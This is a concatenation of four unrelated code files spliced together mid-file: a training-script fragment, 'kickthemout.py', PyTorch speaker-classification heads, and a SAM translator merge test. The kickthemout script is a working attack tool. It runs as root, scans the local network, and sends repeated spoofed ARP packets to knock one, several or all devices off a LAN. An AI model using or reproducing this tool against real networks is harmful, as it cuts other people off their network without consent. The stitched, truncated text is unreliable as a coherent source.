# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger.setLevel(logging.INFO if training_args.should_log else logging.WARN)
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Set the verbosity to info of the Transformers logger (on main process only):
if training_args.should_log:
transformers.utils.logging.set_verbosity_info()
logger.info(f"Training/evaluation parameters {training_args}")
if data_args.source_prefix is None and model_args.model_name_or_path in [
"t5-small",
"t5-base",
"t5-large",
"t5-3b",
"t5-11b",
]:
logger.warning(
"You're running a t5 model but didn't provide a source prefix, which is expected, e.g. with "
"`--source_prefix 'translate English to German: ' `"
)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
# Get the datasets: you can either provide your own JSON training and evaluation files (see below)
# or just provide the name of one of the public datasets available on the hub | |
<filename>kickthemout.py
#!/usr/bin/env python
# -.- coding: utf-8 -.-
# kickthemout.py
# authors: k4m4 & xdavidhu
"""
Copyright (C) 2016 <NAME> (<EMAIL>) & <NAME> (<EMAIL>)
See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
"""
import time, os, sys, logging, math
from time import sleep
import urllib2 as urllib
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
notRoot = False
try:
if os.geteuid() != 0:
print("\n{0}ERROR: KickThemOut must run as root. Try again with sudo/root:\n\t{1}$ sudo python kickthemout.py{2}\n").format(RED, GREEN, END)
notRoot = True
except:
# User is probably on windows
pass
if notRoot:
raise SystemExit
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy!
try:
from scapy.all import *
import scan, spoof
except:
print("\n{0}ERROR: Requirements have not been properly satisfied. Please try running:\n\t{1}$ sudo pip install -r requirements.txt{2}").format(RED, GREEN, END)
print("\n{0}If you still get the same error, please submit an issue here:\n\t{1}https://github.com/k4m4/kickthemout/issues\n{2}").format(RED, BLUE, END)
raise SystemExit
def heading():
sys.stdout.write(GREEN + """
█ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀
█▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █
█▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █
█ █ ▐█ █▄ ▄▀ █ █ █ █ █ █▄ ▄▀ █ █ ▀████ █ █ █
█ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀
▀ ▀ ▀ ▀ ▀▀▀
""" + END + BLUE +
'\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(98) +
'\n' + 'Made With <3 by: {0}<NAME> ({1}k4m4{2}) & {0}<NAME> ({1}xdavidhu{2}){3}'.format(
YELLOW, RED, YELLOW, BLUE).center(111) +
'\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86))
def optionBanner():
print('\nChoose option from menu:\n')
sleep(0.2)
print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
print('\t{0}[{1}2{2}]{3} Kick SOME Off').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
print('\t{0}[{1}3{2}]{3} Kick ALL Off').format(YELLOW, RED, YELLOW, WHITE)
sleep(0.2)
print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)
def runDebug():
print("\n\n{0}WARNING! An unknown error has occurred, starting debug...{1}").format(RED, END)
print(
"{0}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private informations removed if necessary){1}").format(
RED, END)
print("{0}").format(RED)
try:
print("Current defaultGatewayMac: " + defaultGatewayMac)
except:
print ("Failed to print defaultGatewayMac...")
try:
print ("Reloading mac getter function...")
regenOnlineIPs()
print("Reloaded defaultGatewayMac: " + defaultGatewayMac)
except:
print ("Failed to reload mac getter function / to print defaultGatewayMac...")
try:
print ("Known gateway IP: " + defaultGatewayIP)
except:
print ("Failed to print defaultGatewayIP...")
try:
print ("Current hostslist array: ")
print hostsList
except:
print ("Failed to print hostsList array...")
print ("DEBUG FINISHED.\nShutting down...")
print("{0}").format(END)
raise SystemExit
def regenOnlineIPs():
global onlineIPs
global defaultGatewayMac
global defaultGatewayMacSet
if not defaultGatewayMacSet:
defaultGatewayMac = ""
onlineIPs = []
for host in hostsList:
onlineIPs.append(host[0])
if not defaultGatewayMacSet:
if host[0] == defaultGatewayIP:
defaultGatewayMac = host[1]
if not defaultGatewayMacSet and defaultGatewayMac == "":
print("\n{0}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END)
header = ("{0}kickthemout{1}> {2}Enter your gateway's MAC Address {3}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END))
defaultGatewayMac = raw_input(header)
defaultGatewayMacSet = True
def scanNetwork():
global hostsList
try:
hostsList = scan.scanNetwork()
except KeyboardInterrupt:
print('\n\n{0}Thanks for dropping by.\nCatch ya later!{1}').format(GREEN, END)
raise SystemExit
except:
print("\n{0}ERROR: Network scanning failed. Please check your requirements configuration.{1}\n").format(RED, END)
raise SystemExit
regenOnlineIPs()
def kickoneoff():
os.system("clear||cls")
print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork()
print("Online IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
vendor = resolveMac(mac)
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t"+ vendor + "{4}").format(YELLOW, WHITE, RED, GREEN, END)
canBreak = False
while not canBreak:
try:
choice = int(raw_input("\nChoose a target: "))
one_target_ip = onlineIPs[choice]
canBreak = True
except KeyboardInterrupt:
return
except:
print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, END)
one_target_mac = ""
for host in hostsList:
if host[0] == one_target_ip:
one_target_mac = host[1]
if one_target_mac == "":
print("\nIP address is not up. Please try again.")
return
print("\n{0}Target: {1}" + one_target_ip).format(GREEN, END)
print("\n{0}Spoofing started... {1}").format(GREEN, END)
try:
while True:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
time.sleep(10)
except KeyboardInterrupt:
print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
reArp = 1
while reArp != 10:
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.5)
print("{0}Re-arped{1} target successfully.{2}").format(RED, GREEN, END)
def kicksomeoff():
os.system("clear||cls")
print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork()
print("Online IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
vendor = resolveMac(mac)
print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t" + vendor + "{4}").format(YELLOW, WHITE, RED, GREEN, END)
canBreak = False
while not canBreak:
try:
choice = raw_input("\nChoose devices to target(comma-separated): ")
if ',' in choice:
some_targets = choice.split(",")
canBreak = True
else:
print("\n{0}ERROR: Please select more than 1 devices from the list.{1}\n").format(RED, END)
except KeyboardInterrupt:
return
some_ipList = ""
for i in some_targets:
try:
some_ipList += GREEN + "'" + RED + onlineIPs[int(i)] + GREEN + "', "
except KeyboardInterrupt:
return
except:
print("\n{0}ERROR: '{1}" + i + "{2}' is not in the list.{3}\n").format(RED, GREEN, RED, END)
return
some_ipList = some_ipList[:-2] + END
print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END)
print("\n{0}Spoofing started... {1}").format(GREEN, END)
try:
while True:
for i in some_targets:
ip = onlineIPs[int(i)]
for host in hostsList:
if host[0] == ip:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
time.sleep(10)
except KeyboardInterrupt:
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
reArp = 1
while reArp != 10:
for i in some_targets:
ip = onlineIPs[int(i)]
for host in hostsList:
if host[0] == ip:
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.5)
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
def kickalloff():
os.system("clear||cls")
print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END)
scanNetwork()
print("Online IPs: ")
for i in range(len(onlineIPs)):
mac = ""
for host in hostsList:
if host[0] == onlineIPs[i]:
mac = host[1]
vendor = resolveMac(mac)
print(str(" {0}"+ str(onlineIPs[i]) + "{1}\t" + vendor + "{2}").format(RED, GREEN, END))
print("\n{0}Spoofing started... {1}").format(GREEN, END)
try:
reScan = 0
while True:
for host in hostsList:
if host[0] != defaultGatewayIP:
spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1])
reScan += 1
if reScan == 4:
reScan = 0
scanNetwork()
time.sleep(10)
except KeyboardInterrupt:
print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END)
reArp = 1
while reArp != 10:
for host in hostsList:
if host[0] != defaultGatewayIP:
try:
spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1])
except KeyboardInterrupt:
pass
except:
runDebug()
reArp += 1
time.sleep(0.5)
print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END)
def getDefaultInterface():
def long2net(arg):
if (arg <= 0 or arg >= 0xFFFFFFFF):
raise ValueError("illegal netmask value", hex(arg))
return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
def to_CIDR_notation(bytes_network, bytes_netmask):
network = scapy.utils.ltoa(bytes_network)
netmask = long2net(bytes_netmask)
net = "%s/%s" % (network, netmask)
if netmask < 16:
return None
return net
for network, netmask, _, interface, address in scapy.config.conf.route.routes:
if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
continue
if netmask <= 0 or netmask == 0xFFFFFFFF:
continue
net = to_CIDR_notation(network, netmask)
if interface != scapy.config.conf.iface:
continue
if net:
return interface
def getGatewayIP():
try:
getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
return getGateway_p.src
except:
print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END)
header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END))
gatewayIP = raw_input(header)
return gatewayIP
def getDefaultInterfaceMAC():
try:
defaultInterfaceMac = get_if_hwaddr(defaultInterface)
if defaultInterfaceMac == "" or not defaultInterfaceMac:
print(
"\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(
RED, END)
header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
defaultInterfaceMac = raw_input(header)
return defaultInterfaceMac
else:
return defaultInterfaceMac
except:
print("\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END)
header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END))
defaultInterfaceMac = raw_input(header)
return defaultInterfaceMac
def resolveMac(mac):
try:
url = "http://macvendors.co/api/vendorname/"
request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"})
response = urllib.urlopen(request)
vendor = response.read()
vendor = vendor.decode("utf-8")
vendor = vendor[:25]
return vendor
except:
return "N/A"
def main():
heading()
print(
"\n{0}Using interface '{1}" + defaultInterface + "{2}' with mac address '{3}" + defaultInterfaceMac + "{4}'.\nGateway IP: '{5}"
+ defaultGatewayIP + "{6}' --> {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN,
RED, GREEN, RED, GREEN, END)
if len(hostsList) == 0 or len(hostsList) == 1:
if len(hostsList) == 1:
if hostsList[0][0] == | |
<reponame>entn-at/dropclass_speaker
import math
from collections import OrderedDict
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
'''
AdaCos and Ad margin loss taken from https://github.com/4uiiurz1/pytorch-adacos
'''
class DropClassBase(nn.Module):
def __init__(self, num_classes):
'''
DropClass class which other classifier heads should inherit from
This is to package the useful wrapper scripts for which classes to include/ignore
The class has two main modes, called via .drop() and .nodrop(), which sets which method will be
called by .forward()
forward_drop defines the ordinary behaviour
forward_nodrop defines the behaviour in which only the remaining class columns are used
'''
super(DropClassBase, self).__init__()
self.n_classes = num_classes
self.dropmode = False # Default is the normal behaviour
self.set_ignored_classes([])
self.combined_class_label = None
def forward(self, input, label=None):
'''
input: (batch_size, num_features): FloatTensor
label (optional): (batch_size): LongTensor
'''
if self.dropmode:
if label is not None:
assert (torch.max(label) < len(self.rem_classes)), 'Contains label out of range of allowed classes: Have they been converted?'
return self.forward_drop(input, label=label)
else:
return self.forward_nodrop(input, label=label)
def drop(self):
self.dropmode = True
def nodrop(self):
self.dropmode = False
def forward_drop(self, input, label=None):
raise NotImplementedError
def forward_nodrop(self, input, label=None):
raise NotImplementedError
def set_ignored_classes(self, ignored:list):
if len(ignored) != 0:
assert min(ignored) >= 0
assert max(ignored) < self.n_classes
self.ignored = sorted(list(set(ignored)))
self.rem_classes = sorted(set(np.arange(self.n_classes)) - set(ignored))
self.ldict = OrderedDict({k:v for v, k in enumerate(self.rem_classes)}) #mapping of original label to new index
self.idict = OrderedDict({k:v for k, v in enumerate(self.rem_classes)}) #mapping of remaining indexes to original label
def set_remaining_classes(self, remaining:list):
assert min(remaining) >= 0
assert max(remaining) < self.n_classes
self.rem_classes = sorted(set(remaining))
self.ignored = sorted(set(np.arange(self.n_classes)) - set(remaining))
self.ldict = OrderedDict({k:v for v, k in enumerate(self.rem_classes)}) #mapping of original label to new index
self.idict = OrderedDict({k:v for k, v in enumerate(self.rem_classes)}) #mapping of remaining indexes to original label
def get_mini_labels(self, label:list):
# convert list of labels into new indexes for ignored classes
mini_labels = torch.LongTensor(list(map(lambda x: self.ldict[x], label)))
return mini_labels
def get_orig_labels(self, label:list):
# convert list of mini_labels into original class labels
# assert not self.combined_class_label, 'Combined classes means original labels not recoverable'
orig_labels = list(map(lambda x: self.idict[x], label))
return orig_labels
def set_remaining_classes_comb(self, remaining:list):
# remaining must not include the combined class
assert self.combined_class_label is not None, 'combined_class_label has not been set'
assert min(remaining) >= 0
assert max(remaining) < self.n_classes
remaining.append(self.combined_class_label)
self.rem_classes = sorted(set(remaining))
self.ignored = sorted(set(np.arange(self.n_classes)) - set(remaining)) # not really ignored, just combined
self.ldict = OrderedDict({k:v for v, k in enumerate(self.rem_classes)})
for k in self.ignored:
self.ldict[k] = self.combined_class_label # set all ignored classes to the combined class label
self.idict = OrderedDict({k:v for k, v in enumerate(self.rem_classes)}) # not the original mapping for comb classes
class DropAffine(DropClassBase):
def __init__(self, num_features, num_classes):
super(DropAffine, self).__init__(num_classes)
self.fc = nn.Linear(num_features, num_classes)
self.reset_parameters()
def reset_parameters(self):
self.fc.reset_parameters()
def forward_nodrop(self, input, label=None):
W = self.fc.weight
b = self.fc.bias
logits = F.linear(input, W, b)
return logits
def forward_drop(self, input, label=None):
W = self.fc.weight[self.rem_classes]
b = self.fc.bias[self.rem_classes]
logits = F.linear(input, W, b)
return logits
class L2SoftMax(DropClassBase):
def __init__(self, num_features, num_classes):
super(L2SoftMax, self).__init__(num_classes)
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
x = F.normalize(input)
W = F.normalize(self.W)
logits = F.linear(x, W)
return logits
def forward_drop(self, input, label=None):
x = F.normalize(input)
W = F.normalize(self.W[self.rem_classes])
logits = F.linear(x, W)
return logits
class SoftMax(DropClassBase):
def __init__(self, num_features, num_classes):
super(SoftMax, self).__init__(num_classes)
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
x = input
W = self.W
logits = F.linear(x, W)
return logits
def forward_drop(self, input, label=None):
x = input
W = self.W[self.rem_classes]
logits = F.linear(x, W)
return logits
class XVecHead(DropClassBase):
def __init__(self, num_features, num_classes, hidden_features=None):
super(XVecHead, self).__init__(num_classes)
hidden_features = num_features if not hidden_features else hidden_features
self.fc_hidden = nn.Linear(num_features, hidden_features)
self.nl = nn.LeakyReLU()
self.bn = nn.BatchNorm1d(hidden_features)
self.fc = nn.Linear(hidden_features, num_classes)
self.reset_parameters()
def reset_parameters(self):
self.fc.reset_parameters()
def forward_nodrop(self, input, label=None):
input = self.fc_hidden(input)
input = self.nl(input)
input = self.bn(input)
W = self.fc.weight
b = self.fc.bias
logits = F.linear(input, W, b)
return logits
def forward_drop(self, input, label=None):
input = self.fc_hidden(input)
input = self.nl(input)
input = self.bn(input)
W = self.fc.weight[self.rem_classes]
b = self.fc.bias[self.rem_classes]
logits = F.linear(input, W, b)
return logits
class AMSMLoss(DropClassBase):
def __init__(self, num_features, num_classes, s=30.0, m=0.4):
super(AMSMLoss, self).__init__(num_classes)
self.num_features = num_features
self.n_classes = num_classes
self.s = s
self.m = m
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W)
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
target_logits = logits - self.m
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
def forward_drop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W[self.rem_classes])
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
target_logits = logits - self.m
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
class SphereFace(DropClassBase):
def __init__(self, num_features, num_classes, s=30.0, m=1.35):
super(SphereFace, self).__init__(num_classes)
self.num_features = num_features
self.n_classes = num_classes
self.s = s
self.m = m
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W)
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
target_logits = torch.cos(self.m * theta)
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
def forward_drop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W[self.rem_classes])
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
target_logits = torch.cos(self.m * theta)
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
class ArcFace(DropClassBase):
def __init__(self, num_features, num_classes, s=30.0, m=0.50):
super(ArcFace, self).__init__(num_classes)
self.num_features = num_features
self.n_classes = num_classes
self.s = s
self.m = m
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W)
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
target_logits = torch.cos(theta + self.m)
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
def forward_drop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W[self.rem_classes])
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# add margin
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
target_logits = torch.cos(theta + self.m)
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
output = logits * (1 - one_hot) + target_logits * one_hot
# feature re-scale
output *= self.s
return output
class AdaCos(DropClassBase):
def __init__(self, num_features, num_classes, m=0.50):
super(AdaCos, self).__init__(num_classes)
self.num_features = num_features
self.n_classes = num_classes
self.s = math.sqrt(2) * math.log(num_classes - 1)
self.m = m
self.W = nn.Parameter(torch.FloatTensor(num_classes, num_features))
self.reset_parameters()
def reset_parameters(self):
nn.init.xavier_uniform_(self.W)
def forward_nodrop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W)
# dot product
logits = F.linear(x, W)
if label is None:
return logits
# feature re-scale
theta = torch.acos(torch.clamp(logits, -1.0 + 1e-7, 1.0 - 1e-7))
one_hot = torch.zeros_like(logits)
one_hot.scatter_(1, label.view(-1, 1).long(), 1)
with torch.no_grad():
B_avg = torch.where(one_hot < 1, torch.exp(self.s * logits), torch.zeros_like(logits))
B_avg = torch.sum(B_avg) / input.size(0)
theta_med = torch.median(theta[one_hot == 1])
self.s = torch.log(B_avg) / torch.cos(torch.min(math.pi/4 * torch.ones_like(theta_med), theta_med))
output = self.s * logits
return output
def forward_drop(self, input, label=None):
# normalize features
x = F.normalize(input)
# normalize weights
W = F.normalize(self.W[self.rem_classes])
| |
<filename>tests/plugins/globals/test_globals.py
from parameterized import parameterized
from unittest import TestCase
from mock import patch, Mock
from samtranslator.plugins.globals.globals import GlobalProperties, Globals, InvalidGlobalsSectionException
class GlobalPropertiesTestCases(object):
dict_with_single_level_should_be_merged = {
"global": {
"a": 1,
"b": 2
},
"local": {
"a": "foo",
"c": 3,
"d": 4
},
"expected_output": {
"a": "foo",
"b": 2,
"c": 3,
"d": 4
}
}
dict_keys_are_case_sensitive = {
"global": {
"banana": "is tasty"
},
"local": {
"BaNaNa": "is not tasty"
},
"expected_output": {
"banana": "is tasty",
"BaNaNa": "is not tasty"
}
}
dict_properties_with_different_types_must_be_overridden_str_and_dict = {
"global": {
"key": "foo"
},
"local": {
"key": {"a": "b"}
},
"expected_output": {
"key": {"a": "b"}
}
}
dict_properties_with_different_types_must_be_overridden_boolean_and_int = {
"global": {
"key": True
},
"local": {
"key": 1
},
"expected_output": {
"key": 1
}
}
dict_properties_with_different_types_must_be_overridden_dict_and_array = {
"global": {
"key": {"a": "b"}
},
"local": {
"key": ["a"]
},
"expected_output": {
"key": ["a"]
}
}
dict_with_empty_local_must_merge = {
"global": {
"a": "b"
},
"local": {},
"expected_output": {
"a": "b"
}
}
nested_dict_keys_should_be_merged = {
"global": {
"key1": {
"key2": {
"key3": {
"key4": "value"
}
}
}
},
"local": {
"key1": {
"key2": {
"key3": {
"key4": "local value"
},
},
}
},
"expected_output": {
"key1": {
"key2": {
"key3": {
"key4": "local value"
},
},
}
}
}
nested_dict_with_different_levels_should_be_merged = {
"global": {
"key1": {
"key2": {
"key3": "value3"
},
"globalOnlyKey": "global value"
}
},
"local": {
"key1": {
"key2": "foo",
"localOnlyKey": "local value"
}
},
"expected_output": {
"key1": {
# Key2 does not recurse any further
"key2": "foo",
"globalOnlyKey": "global value",
"localOnlyKey": "local value"
}
}
}
nested_dicts_with_non_overridden_keys_should_be_copied = {
"global": {
"key1": {
"key2": {
"key3": {
"key4": "value"
}
},
"globalOnly": {
"globalOnlyKey": "globalOnlyValue"
}
}
},
"local": {
"key1": {
"key2": {
"key3": {
"localkey4": "other value 4"
},
"localkey3": "other value 3"
},
"localkey2": "other value 2",
}
},
"expected_output": {
"key1": {
"key2": {
"key3": {
"key4": "value",
"localkey4": "other value 4"
},
"localkey3": "other value 3"
},
"localkey2": "other value 2",
"globalOnly": {
"globalOnlyKey": "globalOnlyValue"
}
}
}
}
arrays_with_mutually_exclusive_elements_must_be_concatenated = {
"global": [1, 2, 3],
"local": [11, 12, 13],
"expected_output": [
1,2,3,
11,12,13
]
}
arrays_with_duplicate_elements_must_be_concatenated = {
"global": ["a", "b", "c", "z"],
"local": ["a", "b", "x", "y", "z"],
"expected_output": [
"a", "b", "c", "z",
"a", "b", "x", "y", "z"
]
}
arrays_with_nested_dict_must_be_concatenated = {
"global": [{"a": 1}, {"b": 2}],
"local": [{"x": 1}, {"y": 2}],
"expected_output": [
{"a": 1}, {"b": 2},
{"x": 1}, {"y": 2}
]
}
arrays_with_mixed_element_types_must_be_concatenated = {
"global": [1, 2, "foo", True, {"x": "y"}, ["nested", "array"]],
"local": [False, 9, 8, "bar"],
"expected_output": [
1, 2, "foo", True, {"x": "y"}, ["nested", "array"],
False, 9, 8, "bar"
]
}
arrays_with_exactly_same_values_must_be_concatenated = {
"global": [{"a": 1}, {"b": 2}, "foo", 1, 2, True, False],
"local": [{"a": 1}, {"b": 2}, "foo", 1, 2, True, False],
"expected_output": [
{"a": 1}, {"b": 2}, "foo", 1, 2, True, False,
{"a": 1}, {"b": 2}, "foo", 1, 2, True, False
]
}
# Arrays are concatenated. Other keys in dictionary are merged
nested_dict_with_array_values_must_be_merged_and_concatenated = {
"global": {
"key": "global value",
"nested": {
"array_key": [1, 2, 3],
},
"globalOnlyKey": "global value"
},
"local": {
"key": "local value",
"nested": {
"array_key": [8, 9, 10],
},
"localOnlyKey": "local value"
},
"expected_output": {
"key": "local value",
"nested": {
"array_key": [
1, 2, 3,
8, 9, 10
],
},
"globalOnlyKey": "global value",
"localOnlyKey": "local value"
}
}
intrinsic_function_must_be_overridden = {
"global": {
"Ref": "foo"
},
"local": {
"Fn::Spooky": "bar"
},
"expected_output": {
"Fn::Spooky": "bar"
}
}
intrinsic_function_in_global_must_override_dict_value_in_local = {
"global": {
"Ref": "foo"
},
"local": {
"a": "b"
},
"expected_output": {
"a": "b"
}
}
intrinsic_function_in_local_must_override_dict_value_in_global = {
"global": {
"a": "b"
},
"local": {
"Fn::Something": "value"
},
"expected_output": {
"Fn::Something": "value"
}
}
intrinsic_function_in_nested_dict_must_be_overridden = {
"global": {
"key1": {
"key2": {
"key3": {
"Ref": "foo"
},
"globalOnlyKey": "global value"
}
}
},
"local": {
"key1": {
"key2": {
"key3": {
"Fn::Something": "New value"
}
},
}
},
"expected_output": {
"key1": {
"key2": {
"key3": {
"Fn::Something": "New value"
},
"globalOnlyKey": "global value"
},
}
}
}
invalid_intrinsic_function_dict_must_be_merged = {
"global": {
# This is not an intrinsic function because the dict contains two keys
"Ref": "foo",
"key": "global value"
},
"local": {
"Fn::Something": "bar",
"other": "local value"
},
"expected_output": {
"Ref": "foo",
"key": "global value",
"Fn::Something": "bar",
"other": "local value"
}
}
intrinsic_function_in_local_must_override_invalid_intrinsic_in_global = {
"global": {
# This is not an intrinsic function because the dict contains two keys
"Ref": "foo",
"key": "global value"
},
"local": {
# This is an intrinsic function which essentially resolves to a primitive type.
# So local is primitive type whereas global is a dictionary. Prefer local
"Fn::Something": "bar"
},
"expected_output": {
"Fn::Something": "bar"
}
}
primitive_type_inputs_must_be_handled = {
"global": "input string",
"local": 123,
"expected_output": 123
}
mixed_type_inputs_must_be_handled = {
"global": {"a": "b"},
"local": [1, 2, 3],
"expected_output": [1, 2, 3]
}
class TestGlobalPropertiesMerge(TestCase):
# Get all attributes of the test case object which is not a built-in method like __str__
@parameterized.expand([d for d in dir(GlobalPropertiesTestCases)
if not d.startswith("__")
])
def test_global_properties_merge(self, testcase):
configuration = getattr(GlobalPropertiesTestCases, testcase)
if not configuration:
raise Exception("Invalid configuration for test case " + testcase)
global_properties = GlobalProperties(configuration["global"])
actual = global_properties.merge(configuration["local"])
self.assertEquals(actual, configuration["expected_output"])
